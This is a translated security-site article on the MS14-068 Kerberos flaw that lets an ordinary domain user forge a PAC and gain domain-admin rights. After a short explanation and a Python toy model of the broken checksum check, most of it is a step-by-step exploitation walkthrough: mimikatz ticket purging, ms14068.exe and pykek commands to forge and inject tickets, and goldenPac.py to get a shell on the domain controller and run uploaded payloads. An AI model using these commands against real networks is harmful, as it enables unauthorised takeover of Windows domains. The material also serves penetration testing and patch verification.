MS14-068 domain privilege escalation vulnerability summary - vulnerability warning - the black bar safety net

2017-02-14T00:00:00
ID MYHACK58:62201783391
Type myhack58
Reporter Anonymous (佚名)
Modified 2017-02-14T00:00:00

Description

0x01 Origin of the vulnerability

When talking about MS14-068 one has to talk about the silver ticket. A silver ticket is a TGS, that is, a service ticket: the ticket the client sends directly to the server when it requests a service resource. If the server does not ask the domain controller (DC) to validate the PAC, the client can forge domain-admin rights into it and access the server. So the root of MS14-068 is closely related to the silver ticket. The mimikatz author's slides describe it like this: [image]

So this really is a big hole: it lets any ordinary user in the domain raise their own rights to domain administrator. Microsoft's patch is KB3011780. Any domain controller that has not received this patch (the bulletin covers Windows Server 2003 through 2012 R2) is in a very bad position. https://technet.microsoft.com/library/security/ms14-068.aspx

0x02 Exploitation

2.1 Testing in a Windows environment

In a Windows environment the mimikatz author has already written an exploit: https://github.com/gentilkiwi/kekeo. The ms14068 tool in that repository is exactly the tool for this vulnerability. To test it you still have to understand the whole Kerberos authentication flow; otherwise you will not understand the principle, and when something goes wrong during the test you will not know how to fix it. As penetration testers, if we do not understand an authentication protocol this central to Windows environments, intranet penetration is wishful thinking.

To use this vulnerability we need an ordinary domain user's account name and its password or hash (I have summarised pass-the-hash in other articles; for this purpose the hash is as good as the password), plus the domain name and the user's SID. These are not the hard part. The hard part is getting a domain user account at all, for example by grabbing a hash or plaintext password from a machine inside the domain, or by some other method.
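To make the "the KDC did not really check the PAC signature" point concrete, here is an added Python toy model of the PAC signature check that KB3011780 fixes. It is illustration written for this page, not code from the article, kekeo or pykek. Assumptions: the PAC body is an opaque byte string standing in for the marshalled logon info, only the RC4 HMAC-MD5 keyed checksum type (-138) is modelled as the legitimate signing type (the AES keyed types are left out), the keys and the account data (jack, RID 1104, the group RIDs) are constructed, and the error strings are the Kerberos error names a DC returns in each case.

```python
"""Toy model of the PAC signature check that MS14-068 broke.

Only the two PAC_SIGNATURE_DATA buffers are modelled; the PAC body is an
opaque byte string standing in for the marshalled KERB_VALIDATION_INFO.
Keys, account names and RIDs below are constructed for the demo.
"""
import hashlib
import hmac
from dataclasses import dataclass

# Kerberos checksum type numbers (RFC 3961 / RFC 4757 / MS-PAC 2.8).
KERB_CHECKSUM_RSA_MD5 = 7       # plain MD5: unkeyed, anyone can compute it
KERB_CHECKSUM_HMAC_MD5 = -138   # RC4-HMAC keyed checksum
PAC_KEY_USAGE = 17              # KERB_NON_KERB_CKSUM_SALT (MS-PAC 2.8.2)

# Only keyed checksum types may sign a PAC. The AES keyed types (15, 16)
# exist too but are not modelled here.
KEYED_CHECKSUM_TYPES = {KERB_CHECKSUM_HMAC_MD5}

# Constructed long-term keys; the attacker knows neither. For a TGT the
# service key is the krbtgt key as well; two values are used here only so
# the two checks stay distinguishable.
SERVICE_KEY = hashlib.md5(b"constructed service secret").digest()
KDC_KEY = hashlib.md5(b"constructed krbtgt secret").digest()


@dataclass
class PacSignature:
    cksum_type: int
    signature: bytes


@dataclass
class Pac:
    body: bytes                 # stands in for the logon-info buffer
    server_sig: PacSignature    # over the body, keyed with the service key
    kdc_sig: PacSignature       # over the server signature, keyed with krbtgt's key


def encode_logon_info(username: str, rid: int, group_rids: list[int]) -> bytes:
    """Flat stand-in for KERB_VALIDATION_INFO: who the ticket says you are."""
    return f"{username}:{rid}:{','.join(map(str, group_rids))}".encode()


def checksum(cksum_type: int, key: bytes, data: bytes) -> bytes:
    """Compute a Kerberos checksum of the given type over data."""
    if cksum_type == KERB_CHECKSUM_RSA_MD5:
        return hashlib.md5(data).digest()          # the key is simply ignored
    if cksum_type == KERB_CHECKSUM_HMAC_MD5:
        # RFC 4757 section 4 / MS-PAC 2.8.2: Ksign = HMAC-MD5(K, "signaturekey\0"),
        # tmp = MD5(usage || data), checksum = HMAC-MD5(Ksign, tmp).
        ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
        tmp = hashlib.md5(PAC_KEY_USAGE.to_bytes(4, "little") + data).digest()
        return hmac.new(ksign, tmp, hashlib.md5).digest()
    raise ValueError(f"unsupported checksum type {cksum_type}")


def sign_pac(body: bytes, service_key: bytes, kdc_key: bytes) -> Pac:
    """What a legitimate KDC does: both signatures use a keyed checksum."""
    server_sig = PacSignature(KERB_CHECKSUM_HMAC_MD5,
                              checksum(KERB_CHECKSUM_HMAC_MD5, service_key, body))
    kdc_sig = PacSignature(KERB_CHECKSUM_HMAC_MD5,
                           checksum(KERB_CHECKSUM_HMAC_MD5, kdc_key, server_sig.signature))
    return Pac(body, server_sig, kdc_sig)


def forge_pac(username: str, rid: int, group_rids: list[int]) -> Pac:
    """What the MS14-068 exploits do: claim any groups, 'sign' with unkeyed MD5."""
    body = encode_logon_info(username, rid, group_rids)
    server_sig = PacSignature(KERB_CHECKSUM_RSA_MD5, checksum(KERB_CHECKSUM_RSA_MD5, b"", body))
    kdc_sig = PacSignature(KERB_CHECKSUM_RSA_MD5,
                           checksum(KERB_CHECKSUM_RSA_MD5, b"", server_sig.signature))
    return Pac(body, server_sig, kdc_sig)


def _signatures_match(pac: Pac, service_key: bytes, kdc_key: bytes) -> bool:
    srv = checksum(pac.server_sig.cksum_type, service_key, pac.body)
    kdc = checksum(pac.kdc_sig.cksum_type, kdc_key, pac.server_sig.signature)
    return (hmac.compare_digest(srv, pac.server_sig.signature)
            and hmac.compare_digest(kdc, pac.kdc_sig.signature))


def vulnerable_kdc_verify(pac: Pac, service_key: bytes, kdc_key: bytes) -> bool:
    """Pre-KB3011780 behaviour: honour whatever checksum type the client chose."""
    return _signatures_match(pac, service_key, kdc_key)


def patched_kdc_verify(pac: Pac, service_key: bytes, kdc_key: bytes) -> tuple[bool, str]:
    """Post-KB3011780 behaviour: a PAC signed with an unkeyed type is refused outright."""
    for sig in (pac.server_sig, pac.kdc_sig):
        if sig.cksum_type not in KEYED_CHECKSUM_TYPES:
            return False, "KDC_ERR_SUMTYPE_NOSUPP"   # what pykek reports against a patched DC
    if not _signatures_match(pac, service_key, kdc_key):
        return False, "KRB_AP_ERR_MODIFIED"
    return True, ""


if __name__ == "__main__":
    # jack (RID 1104, as in the article) claims Domain Admins (512) and friends.
    forged = forge_pac("jack", 1104, [513, 512, 520, 518, 519])
    print("unpatched DC accepts forged PAC:", vulnerable_kdc_verify(forged, SERVICE_KEY, KDC_KEY))
    print("patched DC on forged PAC:", patched_kdc_verify(forged, SERVICE_KEY, KDC_KEY))
    legit = sign_pac(encode_logon_info("jack", 1104, [513]), SERVICE_KEY, KDC_KEY)
    print("patched DC on real PAC:", patched_kdc_verify(legit, SERVICE_KEY, KDC_KEY))
```

The forged PAC is accepted by the unpatched check because the client is allowed to pick an unkeyed checksum type, so the KDC's own keys never enter the verification. The patched check refuses the unkeyed type before it ever computes anything, which is why an exploit run against a patched DC fails with KDC_ERR_SUMTYPE_NOSUPP rather than with a signature mismatch.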
2.1.2 Usage under Windows

Test environment:
Domain: xxx.com
DC: dc.xxx.com
Win7: win7-01.xxx.com

First, check on the DC whether KB3011780 is installed (it shows up in the installed-updates list and in the Hotfix(s) section of systeminfo output): [image] Unfortunately, the patch has not been applied. Now we test the vulnerability from Win7, an ordinary domain-joined machine where the ordinary domain user jack is logged in. Test access to the domain controller's C$ share: [image] Access is denied. For the ticket we are about to generate to take effect, first clear the existing Kerberos tickets from memory, using mimikatz:

kerberos::purge

[image] Use ms14068 to generate a high-privilege Kerberos ticket (a TGT carrying a forged PAC) and inject it straight into memory:

ms14068.exe /domain:xxx.com /user:jack /password:jackpwd/ /ptt

[image] Then test access again: [image] And test psexec without a password: [image] Great, exactly the effect we wanted.

If you would rather write the ticket to a file for a pass-the-ticket (PTT) attack later, you can do it like this:

ms14068.exe /domain:xxx.com /sid:S-1-5-21-2666969376-4225180350-4077551764 /user:jack /rid:1104 /password:jackpwd/ /aes256 /kdc:dc.xxx.com /ticket:jack_admin.kirbi

Then import the ticket into memory with mimikatz's ptt function.

2.2 Testing in a Kali environment

If you are working remotely against an internal network, first set up a proxy into that network; that needs no further explanation here. Then point your DNS at the domain controller. There are many test tools under Linux, and of course the MSF framework has a module for this vulnerability (auxiliary/admin/kerberos/ms14_068_kerberos_checksum). I will not go over the MSF process again; here is an article that walks through it: https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit

2.2.1 goldenPac.py

Under Kali the tool I strongly recommend for this vulnerability is goldenPac.py from the impacket toolkit. It combines MS14-068 with psexec and is very smooth to use. Kali does not ship Kerberos client support by default, so first install a Kerberos client:

apt-get install krb5-user

The simplest usage:

goldenPac.py xxx.com/jack:jackpwd@dc.xxx.com

gets you a cmd shell: [image] Of course this tool does more than hand you a shell: we can also upload a program to the domain controller and run it directly, for example an Empire stager or an MSF payload. As with any Kerberos tool, dc.xxx.com must resolve and the attacking host's clock must be within the domain's allowed skew of the DC (5 minutes by default), otherwise the request fails before the vulnerability is ever reached.
2.2.2 ms14-068.py

https://github.com/bidord/pykek

Its effect is much the same as the tool written by the mimikatz author. This script generates a Kerberos ticket cache (ccache), which is mainly meant for Kerberos authentication on Linux, but mimikatz also has a pass-the-cache (ptc) function; the ccache is really just a different file format from the kirbi tickets mimikatz generates. It will not work without a Kerberos client either, so install one if it is missing: apt-get install krb5-user. This script needs the SID, the user name and the password (-p; a hash also works, via --rc4). Usage:

ms14-068.py -u jack@xxx.com -s jacksid -d dc.xxx.com
